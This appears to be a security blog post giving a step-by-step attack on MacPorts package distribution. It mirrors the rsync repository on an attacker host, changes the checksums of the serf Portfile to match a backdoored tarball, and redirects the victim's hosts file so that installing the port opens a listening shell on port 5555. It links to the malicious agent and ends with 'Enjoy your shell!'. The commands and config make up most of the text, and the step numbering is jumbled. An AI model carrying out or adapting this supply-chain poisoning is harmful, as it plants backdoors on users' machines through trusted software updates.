The ideaof this postis to showthe flawsin the packages distribution of theproject MacPortsfor Mac OSX
The MacPorts use:
a)Toupdateyour repository rsync server
b) Thepackages are distributedvia http/ ftp
c) Before installinga new package it is checked with theMD5/SHA1 in the local repository
Toperform the attackwe need to do thefollowing tasks:
1) Prepare thersyncserveron theattacker'smachine(192.168.10.133) with all the files of rsync.macports.org:
mkdir -p /dev/evilgrade/release/ports
mkdir -p /dev/evilgrade/release/base
#Get the files from rsync.macports.org
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/ports/ /dev/evilgrade/release/ports/
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/base/ /dev/evilgrade/release/base/
2) Configure the file /etc/rsyncd.conf:
max connections = 20
log file = /var/log/rsync.log
timeout = 300
[release]
comment = Stuff
path = /dev/evilgrade/release/
read only = yes
list = yes
uid = nobody
gid = nogroup
# auth users = craig
# secrets file = /etc/rsyncd.secrets
hosts allow = 192.168.10.0/24 #change for your subnet
3) Then start the rsync server /etc/init.d/rsync start
4) Inthis case we willattack thepackage serfin the categorywww.The idea isthat when you installthis packagewecreate a listener shell port 5555
We have toeditthe repositoryfile /dev/evilgrade/release/ports/www/serf/Portfileand change checksums md5 with thehashof ourpayload/agentfound in/evilgrade/agent/serf-0.7.2.tar.bz2You could alsopreparetherepositoryfor all "Porfiles"point tothe samepackage with the samemd5soanyinstallationwhichinfectthe victimport
This agenthas a line(132)inMakefile.into leave ashellat port 5555
4) On the victim machine(192.168.10.42) for this testaddin/etc/hoststhe following lines ormake anyforwarding traffic attack:
192.168.10.133 serf.googlecode.com rsync.macports.org5)
6) On thevictimmachineruna "sudo portselfupdate" and then "sudo port install serf"
7) We verify thatour attackeris receivingthe rsync requestbyreadingthe file/var/log/rsync.log
Check what happend in evilgrade:
8) Enjoy your shell!
Download the MacPort agent from http://www.infobytesec.com/down/macportsevilgrade.tar.gz and uncompress it in the evilgrade path.
Remember to keepyour systems updated! ;)